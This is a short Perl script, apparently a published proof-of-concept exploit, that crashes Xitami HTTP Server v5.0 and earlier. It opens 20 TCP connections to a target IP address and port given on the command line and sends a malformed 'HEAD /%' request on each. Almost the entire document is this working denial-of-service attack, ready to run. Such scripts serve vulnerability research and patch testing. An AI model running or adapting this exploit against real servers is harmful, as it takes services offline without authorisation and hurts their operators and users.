#!/usr/bin/perl # # Xitami HTTP Server <= v5.0 Remote Denial of Service. # # ------------------------------------------------------------------------------ # The vulnerability is caused due to an error with HEAD request and multi-socket # This can be exploited to crash the HTTP service. # ------------------------------------------------------------------------------ # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.shell-storm.org use IO::Socket; print "[+] Author : Jonathan Salwan\n"; print "[+] Soft : Xitami HTTP Server v5.0\n"; if (@ARGV < 1) { print "[-] Usage: \n"; print "[-] Exemple: file.pl 127.0.0.1 80\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; print "[+] Sending request...\n"; for($i=0;$i<20;$i++) { $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Failed\n"; print $socket "HEAD /% HTTP/1.0\r\n\r\n"; } print "[+] Done!\n";